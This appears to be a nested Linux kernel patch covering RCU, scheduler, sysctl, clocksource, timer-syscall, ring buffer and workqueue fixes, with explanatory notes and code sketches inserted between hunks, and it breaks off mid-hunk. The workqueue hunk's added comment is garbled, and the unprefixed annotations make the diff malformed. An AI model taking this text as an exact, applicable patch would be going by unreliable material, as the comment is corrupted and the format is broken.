+ 	if (ss_state < SRCU_SIZE_WAIT_CALL)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = raw_cpu_ptr(ssp->sda);
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+@@ -1497,7 +1498,7 @@ void srcu_barrier(struct srcu_struct *ssp)
+ 
+ 	idx = __srcu_read_lock_nmisafe(ssp);
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, 0));
++		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda,	get_boot_cpu_id()));
+ 	else
+ 		for_each_possible_cpu(cpu)
+ 			srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, cpu));
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index fe9840d90e960..d5a4a129a85e9 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -384,6 +384,7 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ {
+ 	int cpu;
+ 	unsigned long flags;
++	bool gpdone = poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq);
+ 	long n;
+ 	long ncbs = 0;
+ 	long ncbsnz = 0;
+@@ -425,21 +426,23 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ 			WRITE_ONCE(rtp->percpu_enqueue_shift, order_base_2(nr_cpu_ids));
+ 			smp_store_release(&rtp->percpu_enqueue_lim, 1);
+ 			rtp->percpu_dequeue_gpseq = get_state_synchronize_rcu();
++			gpdone = false;
+ 			pr_info("Starting switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+-	if (rcu_task_cb_adjust && !ncbsnz &&
+-	    poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq)) {
++	if (rcu_task_cb_adjust && !ncbsnz && gpdone) {
+ 		raw_spin_lock_irqsave(&rtp->cbs_gbl_lock, flags);
+ 		if (rtp->percpu_enqueue_lim < rtp->percpu_dequeue_lim) {
+ 			WRITE_ONCE(rtp->percpu_dequeue_lim, 1);
+ 			pr_info("Completing switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+-		for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
+-			struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
++		if (rtp->percpu_dequeue_lim == 1) {
++			for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
++				struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
+ 
+-			WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++				WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++			}
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+@@ -560,8 +563,9 @@ static int __noreturn rcu_tasks_kthread(void *arg)
+ static void synchronize_rcu_tasks_generic(struct rcu_tasks *rtp)
+ {
+ 	/* Complain if the scheduler has not started.  */
+-	WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
+-			 "synchronize_rcu_tasks called too soon");
++	if (WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
++			 "synchronize_%s() called too soon", rtp->name))
++		return;
+ 
+ 	// If the grace-period kthread is running, use it.
+ 	if (READ_ONCE(rtp->kthread_ptr)) {
+@@ -827,11 +831,21 @@ static void rcu_tasks_pertask(struct task_struct *t, struct list_head *hop)
+ static void rcu_tasks_postscan(struct list_head *hop)
+ {
+ 	/*
+-	 * Wait for tasks that are in the process of exiting.  This
+-	 * does only part of the job, ensuring that all tasks that were
+-	 * previously exiting reach the point where they have disabled
+-	 * preemption, allowing the later synchronize_rcu() to finish
+-	 * the job.
++	 * Exiting tasks may escape the tasklist scan. Those are vulnerable
++	 * until their final schedule() with TASK_DEAD state. To cope with
++	 * this, divide the fragile exit path part into two intersecting
++	 * read side critical sections:
++	 *
++	 * 1) An _SRCU_ read side starting before calling exit_notify(),
++	 *    which may remove the task from the tasklist, and ending after
++	 *    the final preempt_disable() call in do_exit().
++	 *
++	 * 2) An _RCU_ read side starting with the final preempt_disable()
++	 *    call in do_exit() and ending with the final call to schedule()
++	 *    with TASK_DEAD state.
++	 *
++	 * This handles part 1). And postgp will handle part 2) with a
++	 * call to synchronize_rcu().
+ 	 */
+ 	synchronize_srcu(&tasks_rcu_exit_srcu);
+ }
+@@ -898,7 +912,10 @@ static void rcu_tasks_postgp(struct rcu_tasks *rtp)
+ 	 *
+ 	 * In addition, this synchronize_rcu() waits for exiting tasks
+ 	 * to complete their final preempt_disable() region of execution,
+-	 * cleaning up after the synchronize_srcu() above.
++	 * cleaning up after synchronize_srcu(&tasks_rcu_exit_srcu),
++	 * enforcing the whole region before tasklist removal until
++	 * the final schedule() with TASK_DEAD state to be an RCU TASKS
++	 * read side critical section.
+ 	 */
+ 	synchronize_rcu();
+ }
+@@ -988,27 +1005,42 @@ void show_rcu_tasks_classic_gp_kthread(void)
+ EXPORT_SYMBOL_GPL(show_rcu_tasks_classic_gp_kthread);
+ #endif // !defined(CONFIG_TINY_RCU)
+ 
+-/* Do the srcu_read_lock() for the above synchronize_srcu().  */
++/*
++ * Contribute to protecting against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
+ void exit_tasks_rcu_start(void) __acquires(&tasks_rcu_exit_srcu)
+ {
+-	preempt_disable();
+ 	current->rcu_tasks_idx = __srcu_read_lock(&tasks_rcu_exit_srcu);
+-	preempt_enable();
+ }
+ 
+-/* Do the srcu_read_unlock() for the above synchronize_srcu().  */
+-void exit_tasks_rcu_finish(void) __releases(&tasks_rcu_exit_srcu)
++/*
++ * Contribute to protecting against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_stop(void) __releases(&tasks_rcu_exit_srcu)
+ {
+ 	struct task_struct *t = current;
+ 
+-	preempt_disable();
+ 	__srcu_read_unlock(&tasks_rcu_exit_srcu, t->rcu_tasks_idx);
+-	preempt_enable();
+-	exit_tasks_rcu_finish_trace(t);
++}
++
++/*
++ * Contribute to protecting against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_finish(void)
++{
++	exit_tasks_rcu_stop();
++	exit_tasks_rcu_finish_trace(current);
+ }
+ 
+ #else /* #ifdef CONFIG_TASKS_RCU */
+ void exit_tasks_rcu_start(void) { }
++void exit_tasks_rcu_stop(void) { }
+ void exit_tasks_rcu_finish(void) { exit_tasks_rcu_finish_trace(current); }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU */
+ 
+@@ -1036,9 +1068,6 @@ static void rcu_tasks_be_rude(struct work_struct *work)
+ // Wait for one rude RCU-tasks grace period.
+ static void rcu_tasks_rude_wait_gp(struct rcu_tasks *rtp)
+ {
+-	if (num_online_cpus() <= 1)
+-		return;	// Fastpath for only one CPU.
+-
+ 	rtp->n_ipis += cpumask_weight(cpu_online_mask);
+ 	schedule_on_each_cpu(rcu_tasks_be_rude);
+ }
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index ed6c3cce28f23..927abaf6c822e 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -667,7 +667,9 @@ static void synchronize_rcu_expedited_wait(void)
+ 				mask = leaf_node_cpu_bit(rnp, cpu);
+ 				if (!(READ_ONCE(rnp->expmask) & mask))
+ 					continue;
++				preempt_disable(); // For smp_processor_id() in dump_cpu_task().
+ 				dump_cpu_task(cpu);
++				preempt_enable();
+ 			}
+ 		}
+ 		jiffies_stall = 3 * rcu_exp_jiffies_till_stall_check() + 3;
+diff --git a/kernel/resource.c b/kernel/resource.c
+index ddbbacb9fb508..b1763b2fd7ef3 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1343,20 +1343,6 @@ retry:
+ 			continue;
+ 		}
+ 
+-		/*
+-		 * All memory regions added from memory-hotplug path have the
+-		 * flag IORESOURCE_SYSTEM_RAM. If the resource does not have
+-		 * this flag, we know that we are dealing with a resource coming
+-		 * from HMM/devm. HMM/devm use another mechanism to add/release
+-		 * a resource. This goes via devm_request_mem_region and
+-		 * devm_release_mem_region.
+-		 * HMM/devm take care to release their resources when they want,
+-		 * so if we are dealing with them, let us just back off here.
+-		 */
+-		if (!(res->flags & IORESOURCE_SYSRAM)) {
+-			break;
+-		}
+-
+ 		if (!(res->flags & IORESOURCE_MEM))
+ 			break;
+ 
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index ed2a47e4ddaec..0a11f44adee57 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -1777,6 +1777,8 @@ static struct sched_rt_entity *pick_next_rt_entity(struct rt_rq *rt_rq)
+ 	BUG_ON(idx >= MAX_RT_PRIO);
+ 
+ 	queue = array->queue + idx;
++	if (SCHED_WARN_ON(list_empty(queue)))
++		return NULL;
+ 	next = list_entry(queue->next, struct sched_rt_entity, run_list);
+ 
+ 	return next;
+@@ -1789,7 +1791,8 @@ static struct task_struct *_pick_next_task_rt(struct rq *rq)
+ 
+ 	do {
+ 		rt_se = pick_next_rt_entity(rt_rq);
+-		BUG_ON(!rt_se);
++		if (unlikely(!rt_se))
++			return NULL;
+ 		rt_rq = group_rt_rq(rt_se);
+ 	} while (rt_rq);
+ 
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index 137d4abe3eda1..1c240d2c99bcb 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -425,21 +425,6 @@ static void proc_put_char(void **buf, size_t *size, char c)
+ 	}
+ }
+ 
+-static int do_proc_dobool_conv(bool *negp, unsigned long *lvalp,
+-				int *valp,
+-				int write, void *data)
+-{
+-	if (write) {
+-		*(bool *)valp = *lvalp;
+-	} else {
+-		int val = *(bool *)valp;
+-
+-		*lvalp = (unsigned long)val;
+-		*negp = false;
+-	}
+-	return 0;
+-}
+-
+ static int do_proc_dointvec_conv(bool *negp, unsigned long *lvalp,
+ 				 int *valp,
+ 				 int write, void *data)
+@@ -710,16 +695,36 @@ int do_proc_douintvec(struct ctl_table *table, int write,
+  * @lenp: the size of the user buffer
+  * @ppos: file position
+  *
+- * Reads/writes up to table->maxlen/sizeof(unsigned int) integer
+- * values from/to the user buffer, treated as an ASCII string.
++ * Reads/writes one integer value from/to the user buffer,
++ * treated as an ASCII string.
++ *
++ * table->data must point to a bool variable and table->maxlen must
++ * be sizeof(bool).
+  *
+  * Returns 0 on success.
+  */
+ int proc_dobool(struct ctl_table *table, int write, void *buffer,
+ 		size_t *lenp, loff_t *ppos)
+ {
+-	return do_proc_dointvec(table, write, buffer, lenp, ppos,
+-				do_proc_dobool_conv, NULL);
++	struct ctl_table tmp;
++	bool *data = table->data;
++	int res, val;
++
++	/* Do not support arrays yet. */
++	if (table->maxlen != sizeof(bool))
++		return -EINVAL;
++
++	tmp = *table;
++	tmp.maxlen = sizeof(val);
++	tmp.data = &val;
++
++	val = READ_ONCE(*data);
++	res = proc_dointvec(&tmp, write, buffer, lenp, ppos);
++	if (res)
++		return res;
++	if (write)
++		WRITE_ONCE(*data, val);
++	return 0;
+ }
+ 
+ /**
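The rewritten proc_dobool() parses through a temporary int-typed
ctl_table and transfers the result with READ_ONCE()/WRITE_ONCE(). As a
minimal sketch of the caller side (the table and variable names are
hypothetical), a bool sysctl served by this handler is declared as:

	static bool my_feature_enabled = true;

	static struct ctl_table my_sysctls[] = {
		{
			.procname	= "my_feature_enabled",
			.data		= &my_feature_enabled,
			.maxlen		= sizeof(bool),	/* arrays are rejected */
			.mode		= 0644,
			.proc_handler	= proc_dobool,
		},
		{ }
	};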
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 9cf32ccda715d..8cd74b89d5776 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -384,6 +384,15 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ }
+ EXPORT_SYMBOL_GPL(clocksource_verify_percpu);
+ 
++static inline void clocksource_reset_watchdog(void)
++{
++	struct clocksource *cs;
++
++	list_for_each_entry(cs, &watchdog_list, wd_list)
++		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
++}
++
++
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
+@@ -391,6 +400,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
++	unsigned long extra_wait = 0;
+ 	u32 md;
+ 
+ 	spin_lock(&watchdog_lock);
+@@ -410,13 +420,30 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 
+ 		read_ret = cs_watchdog_read(cs, &csnow, &wdnow);
+ 
+-		if (read_ret != WD_READ_SUCCESS) {
+-			if (read_ret == WD_READ_UNSTABLE)
+-				/* Clock readout unreliable, so give it up. */
+-				__clocksource_unstable(cs);
++		if (read_ret == WD_READ_UNSTABLE) {
++			/* Clock readout unreliable, so give it up. */
++			__clocksource_unstable(cs);
+ 			continue;
+ 		}
+ 
++		/*
++		 * When WD_READ_SKIP is returned, it means the system is likely
++		 * under very heavy load, where the latency of reading
++		 * watchdog/clocksource is very high and affects the accuracy
++		 * of the watchdog check. So give the system some space and
++		 * suspend the watchdog check for 5 minutes.
++		 */
++		if (read_ret == WD_READ_SKIP) {
++			/*
++			 * As the watchdog timer will be suspended, and
++			 * cs->last could remain unchanged for 5 minutes, reset
++			 * the counters.
++			 */
++			clocksource_reset_watchdog();
++			extra_wait = HZ * 300;
++			break;
++		}
++
+ 		/* Clocksource initialized ? */
+ 		if (!(cs->flags & CLOCK_SOURCE_WATCHDOG) ||
+ 		    atomic_read(&watchdog_reset_pending)) {
+@@ -512,7 +539,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	 * pair clocksource_stop_watchdog() clocksource_start_watchdog().
+ 	 */
+ 	if (!timer_pending(&watchdog_timer)) {
+-		watchdog_timer.expires += WATCHDOG_INTERVAL;
++		watchdog_timer.expires += WATCHDOG_INTERVAL + extra_wait;
+ 		add_timer_on(&watchdog_timer, next_cpu);
+ 	}
+ out:
+@@ -537,14 +564,6 @@ static inline void clocksource_stop_watchdog(void)
+ 	watchdog_running = 0;
+ }
+ 
+-static inline void clocksource_reset_watchdog(void)
+-{
+-	struct clocksource *cs;
+-
+-	list_for_each_entry(cs, &watchdog_list, wd_list)
+-		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
+-}
+-
+ static void clocksource_resume_watchdog(void)
+ {
+ 	atomic_inc(&watchdog_reset_pending);
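The WD_READ_SKIP branch above is a back-off: reset the per-clocksource
watchdog flags, then stretch the next timer expiry by five minutes. A
minimal sketch of the same idiom for a generic periodic timer (my_timer,
MY_INTERVAL, and work_cycle() are hypothetical):

	static void my_timer_fn(struct timer_list *t)
	{
		unsigned long extra_wait = 0;

		/* skip this cycle when the system is too loaded to measure */
		if (work_cycle() == -EAGAIN)
			extra_wait = HZ * 300;	/* back off for five minutes */

		mod_timer(&my_timer, jiffies + MY_INTERVAL + extra_wait);
	}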
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab62603..e4f0e3b0c4f4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2126,6 +2126,7 @@ SYSCALL_DEFINE2(nanosleep, struct __kernel_timespec __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+@@ -2147,6 +2148,7 @@ SYSCALL_DEFINE2(nanosleep_time32, struct old_timespec32 __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+diff --git a/kernel/time/posix-stubs.c b/kernel/time/posix-stubs.c
+index 90ea5f373e50e..828aeecbd1e8a 100644
+--- a/kernel/time/posix-stubs.c
++++ b/kernel/time/posix-stubs.c
+@@ -147,6 +147,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+@@ -240,6 +241,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 5dead89308b74..0c8a87a11b39d 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1270,6 +1270,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 
+@@ -1297,6 +1298,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 
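The identical one-liners added to hrtimer.c, posix-stubs.c, and
posix-timers.c above all enforce one rule: a syscall that stores restart
state must first invalidate any stale ->fn left by an earlier
interrupted syscall, so sys_restart_syscall() can never invoke it with
mismatched state. The shape of the pattern, with the syscall body
elided:

	/* reset first, so a stale restart function is never re-run */
	current->restart_block.fn = do_no_restart_syscall;
	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
	current->restart_block.nanosleep.rmtp = rmtp;
	/* the sleep path installs its own ->fn only if it must restart */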
+diff --git a/kernel/time/test_udelay.c b/kernel/time/test_udelay.c
+index 13b11eb62685e..20d5df631570e 100644
+--- a/kernel/time/test_udelay.c
++++ b/kernel/time/test_udelay.c
+@@ -149,7 +149,7 @@ module_init(udelay_test_init);
+ static void __exit udelay_test_exit(void)
+ {
+ 	mutex_lock(&udelay_test_lock);
+-	debugfs_remove(debugfs_lookup(DEBUGFS_FILENAME, NULL));
++	debugfs_lookup_and_remove(DEBUGFS_FILENAME, NULL);
+ 	mutex_unlock(&udelay_test_lock);
+ }
+ 
+diff --git a/kernel/torture.c b/kernel/torture.c
+index 789aeb0e1159c..9266ca168b8f5 100644
+--- a/kernel/torture.c
++++ b/kernel/torture.c
+@@ -915,7 +915,7 @@ void torture_kthread_stopping(char *title)
+ 	VERBOSE_TOROUT_STRING(buf);
+ 	while (!kthread_should_stop()) {
+ 		torture_shutdown_absorb(title);
+-		schedule_timeout_uninterruptible(1);
++		schedule_timeout_uninterruptible(HZ / 20);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(torture_kthread_stopping);
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index 918a7d12df8ff..5743be5594153 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -320,8 +320,8 @@ static void blk_trace_free(struct request_queue *q, struct blk_trace *bt)
+ 	 * under 'q->debugfs_dir', thus lookup and remove them.
+ 	 */
+ 	if (!bt->dir) {
+-		debugfs_remove(debugfs_lookup("dropped", q->debugfs_dir));
+-		debugfs_remove(debugfs_lookup("msg", q->debugfs_dir));
++		debugfs_lookup_and_remove("dropped", q->debugfs_dir);
++		debugfs_lookup_and_remove("msg", q->debugfs_dir);
+ 	} else {
+ 		debugfs_remove(bt->dir);
+ 	}
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c366a0a9ddba4..b641cab2745e9 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1580,19 +1580,6 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+ 	return 0;
+ }
+ 
+-/**
+- * rb_check_list - make sure a pointer to a list has the last bits zero
+- */
+-static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+-			 struct list_head *list)
+-{
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
+-		return 1;
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
+-		return 1;
+-	return 0;
+-}
+-
+ /**
+  * rb_check_pages - integrity check of buffer pages
+  * @cpu_buffer: CPU buffer with pages to test
+@@ -1602,36 +1589,27 @@ static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+-	struct list_head *head = cpu_buffer->pages;
+-	struct buffer_page *bpage, *tmp;
++	struct list_head *head = rb_list_head(cpu_buffer->pages);
++	struct list_head *tmp;
+ 
+-	/* Reset the head page if it exists */
+-	if (cpu_buffer->head_page)
+-		rb_set_head_page(cpu_buffer);
+-
+-	rb_head_page_deactivate(cpu_buffer);
+-
+-	if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
+-		return -1;
+-	if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->next)->prev) != head))
+ 		return -1;
+ 
+-	if (rb_check_list(cpu_buffer, head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->prev)->next) != head))
+ 		return -1;
+ 
+-	list_for_each_entry_safe(bpage, tmp, head, list) {
++	for (tmp = rb_list_head(head->next); tmp != head; tmp = rb_list_head(tmp->next)) {
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.next->prev != &bpage->list))
++				rb_list_head(rb_list_head(tmp->next)->prev) != tmp))
+ 			return -1;
++
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.prev->next != &bpage->list))
+-			return -1;
+-		if (rb_check_list(cpu_buffer, &bpage->list))
++				rb_list_head(rb_list_head(tmp->prev)->next) != tmp))
+ 			return -1;
+ 	}
+ 
+-	rb_head_page_activate(cpu_buffer);
+-
+ 	return 0;
+ }
+ 
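rb_check_pages() now wraps every link in rb_list_head() because the ring
buffer stores its head-page flags in the low bits of the ->next/->prev
pointers, so a raw dereference can chase a tagged pointer. A minimal
sketch of validating such a tagged list (FLAG_MASK, masked(), and
check_ring() are hypothetical stand-ins):

	#define FLAG_MASK	3UL

	static inline struct list_head *masked(struct list_head *p)
	{
		return (struct list_head *)((unsigned long)p & ~FLAG_MASK);
	}

	static int check_ring(struct list_head *head)
	{
		struct list_head *tmp;

		for (tmp = masked(head->next); tmp != head; tmp = masked(tmp->next)) {
			/* links must agree once the tag bits are stripped */
			if (masked(masked(tmp->next)->prev) != tmp)
				return -1;
			if (masked(masked(tmp->prev)->next) != tmp)
				return -1;
		}
		return 0;
	}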
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index c9e40f6926504..b677f8d61deb1 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5598,7 +5598,7 @@ static const char readme_msg[] =
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t           s:[synthetic/]<event> <field> [<field>]\n"
+ #endif
+-	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]\n"
++	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>] [if <filter>]\n"
+ 	"\t           -:[<group>/][<event>]\n"
+ #ifdef CONFIG_KPROBE_EVENTS
+ 	"\t    place: [<module>:]<symbol>[+<offset>]|<memaddr>\n"
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 07895deca2711..76ea87b0251ce 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -326,7 +326,7 @@ static struct rcuwait manager_wait = __RCUWAIT_INITIALIZER(manager_wait);
+ static LIST_HEAD(workqueues);		/* PR: list of all workqueues */
+ static bool workqueue_freezing;		/* PL: have wqs started freezing? */
+ 
+-/* PL: allowable cpus for unbound wqs and work items */
++/* PL&A: allowable cpus for unbound wqs and work items */
+ static cpumask_var_t wq_unbound_cpumask;
+ 
+ /* CPU where unbound work was last round robin scheduled from this CPU */
+@@ -3952,7 +3952,8 @@ static void apply_wqattrs_cleanup(struct apply_wqattrs_ctx *ctx)
+ /* allocate the attrs and pwqs for later installation */
+ static struct apply_wqattrs_ctx *
+ apply_wqattrs_prepare(struct workqueue_struct *wq,
+-		      const struct workqueue_attrs *attrs)
++		      const struct workqueue_attrs *attrs,
++		      const cpumask_var_t unbound_cpumask)
+ {
+ 	struct apply_wqattrs_ctx *ctx;
+ 	struct workqueue_attrs *new_attrs, *tmp_attrs;
+@@ -3968,14 +3969,15 @@ apply_wqattrs_prepare(struct workqueue_struct *wq,
+ 		goto out_free;
+ 
+ 	/*
+-	 * Calculate the attrs of the default pwq.
++	 * which is either wq_unbound_cpumask or the cpumask being applied.
++	 * which is wq_unbound_cpumask or to set to wq_unbound_cpumask.
+ 	 * If the user configured cpumask doesn't overlap with the
+ 	 * wq_unbound_cpumask, we fallback to the wq_unbound_cpumask.
+ 	 */
+ 	copy_workqueue_attrs(new_attrs, attrs);
+-	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, wq_unbound_cpumask);
++	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, unbound_cpumask);
+ 	if (unlikely(cpumask_empty(new_attrs->cpumask)))
+-		cpumask_copy(new_attrs->cpumask, wq_unbound_cpumask);
++		cpumask_copy(new_attrs->cpumask, unbound_cpumask);
+ 
+ 	/*
+ 	 * We may create multiple pwqs with differing cpumasks.  Make a
+@@ -4072,7 +4074,7 @@ static int apply_workqueue_attrs_locked(struct workqueue_struct *wq,
+ 		wq->flags &= ~__WQ_ORDERED;
+ 	}
+ 
+-	ctx = apply_wqattrs_prepare(wq, attrs);
++	ctx = apply_wqattrs_prepare(wq, attrs, wq_unbound_cpumask);
+ 	if (!ctx)
+ 		return -ENOMEM;
+ 
+@@ -5334,7 +5336,7 @@ out_unlock:
+ }
+ #endif /* CONFIG_FREEZER */
+ 
+-static int workqueue_apply_unbound_cpumask(void)
++static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ {
+ 	LIST_HEAD(ctxs);
+ 	int ret = 0;
+@@ -5350,7 +5352,7 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		if (wq->flags & __WQ_ORDERED)
+ 			continue;
+ 
+-		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs);
++		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+ 			ret = -ENOMEM;
+ 			break;
+@@ -5365,6 +5367,11 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		apply_wqattrs_cleanup(ctx);
+ 	}
+ 
++	if (!ret) {
++		mutex_lock(&wq_pool_attach_mutex);
++		cpumask_copy(wq_unbound_cpumask, unbound_cpumask);
++		mutex_unlock(&wq_pool_attach_mutex);
++	}
+ 	return ret;
+ }
+ 
+@@ -5383,7 +5390,6 @@ static int workqueue_apply_unbound_cpumask(void)
+ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ {
+ 	int ret = -EINVAL;
+-	cpumask_var_t saved_cpumask;
+ 
+ 	/*
+ 	 * Not excluding isolated cpus on purpose.
+@@ -5397,23 +5403,8 @@ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!zalloc_cpumask_var(&saved_cpumask, GFP_KERNEL)) {
+-			ret = -ENOMEM;
+-			goto out_unlock;
+-		}
+-
+-		/* save the old wq_unbound_cpumask. */
+-		cpumask_copy(saved_cpumask, wq_unbound_cpumask);
+-
+-		/* update wq_unbound_cpumask at first and apply it to wqs. */
+-		cpumask_copy(wq_unbound_cpumask, cpumask);
+-		ret = workqueue_apply_unbound_cpumask();
+-
+-		/* restore the wq_unbound_cpumask when failed. */
+-		if (ret < 0)
+-			cpumask_copy(wq_unbound_cpumask, saved_cpumask);
